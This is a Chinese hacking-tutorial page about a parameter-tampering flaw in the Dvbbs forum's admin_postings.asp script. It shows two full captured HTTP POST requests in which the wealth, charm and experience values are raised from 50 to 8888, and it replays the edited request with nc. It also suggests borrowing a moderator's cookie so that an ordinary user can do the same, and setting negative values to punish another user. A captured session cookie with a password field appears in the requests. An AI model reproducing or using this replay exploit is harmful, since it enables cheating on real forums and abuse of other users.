动网论坛刷分刷经验漏洞-无忧网络网游技术网www.5uwl.net

《无忧网游咨询站》Www.5uwl.Net （免费资源，从无忧开始！）

您现在的位置：无忧网络网游私服技术资源站 >> 技术文章 >> 黑客教程 >> 黑客进阶 >> 黑客入侵 >> 正文

动网论坛刷分刷经验漏洞

作者：佚名文章来源:本站原创阅读：更新时间:2007-2-21 0:10:32

动网对admin_postings.asp设置不严..在进行贴子提升时.可以自己定义数字..达到刷分..刷经验及魅力的目的.
比如我有一贴,
http://127.0.0.1/dispbbs.asp?boardID=30&ID=26954&page=1
然后对本贴进行提升
http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954

默认提升最高的数目是50..如下图

这时候我们用WSockExpert进行抓包....抓到包为

POST /admin_postings.asp?action=uptopic HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=617&usercookies=2&password=hjf87126ffz2C3g7y&userhidden=1&userclass=%B0%E6%D6%F7&username=fhod&StatUserID=6127457519; style=null; ASPSESSIONIDCQTDACAT=JHKDJPECDFDKJHDABKIGCLEM; Dvbbs=; upNum=0

title=%BA%C3%CE%C4%D5%C2&content=%BA%C3&doWealth=50&douserCP=50&douserEP=50&ID=26954&replyID=&boardID=30&msg=&submit=%C8%B7%C8%CF%B2%D9%D7%F7

然后我们来进行修改.
数值修改就在这么一段
doWealth=50&douserCP=50&douserEP=50
我们改为任意一个数...这里我改了doWealth=8888&douserCP=8888&douserEP=8888图个吉利..哈哈.
因为数字修改了..字节也就增加了..我加了6个..所以就做了6个字节..把原来的
Content-Length: 141
改为
Content-Length: 147

完成的就为

POST /admin_postings.asp?action=uptopic HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 147
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=617&usercookies=2&password=hjf87126ffz2C3g7y&userhidden=1&userclass=%B0%E6%D6%F7&username=fhod&StatUserID=6127457519; style=null; ASPSESSIONIDCQTDACAT=JHKDJPECDFDKJHDABKIGCLEM; Dvbbs=; upNum=0

title=%BA%C3%CE%C4%D5%C2&content=%BA%C3&doWealth=8888&douserCP=8888&douserEP=8888&ID=26954&replyID=&boardID=30&msg=&submit=%C8%B7%C8%CF%B2%D9%D7%F7

然后nc提交

c:\nc 127.0.0.1 80 <1.txt

反复提交几次..得到的结果如下图

本测试过程是以版主身份进行的..普通用户暂为测试....个人想法是..本地假设一BBS..以版主身份登陆..抓取cookie包..然后以普通用户登陆一论坛..发贴抓一包..然后将两个包修改..进行提交..如果admin_postings.asp真的设置不严格..应该同样可以达到此目的...此漏洞利用不大..不过对于那些需要金币或魅力及经验值达多少才可以浏缆的贴的论坛是大有用户啊...当然..你要整某人一下..大可以把数字改为负数..不过要记的把Content-Length:改对哦,

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

文章录入：黑虎责任编辑：无忧黑虎

网友评论(只显示最新10条)

内容

标题

作者

站外

关于我们 | 友情链接 | 服务条款 | 广告服务 | 联系站长 | 软件发布 | 会员中心 | 网站导航

          版权所有：Copyright © 2002-2010 中国·无忧网络 Www.5uwl.NET All Rights Reserved.
               建议使用：1024*768 分辨率 Windows2000 Internet Explorer v5.0 or Higher
                      广告投放：[5uwl.net] QQ 267320050 TEL [移]013689532036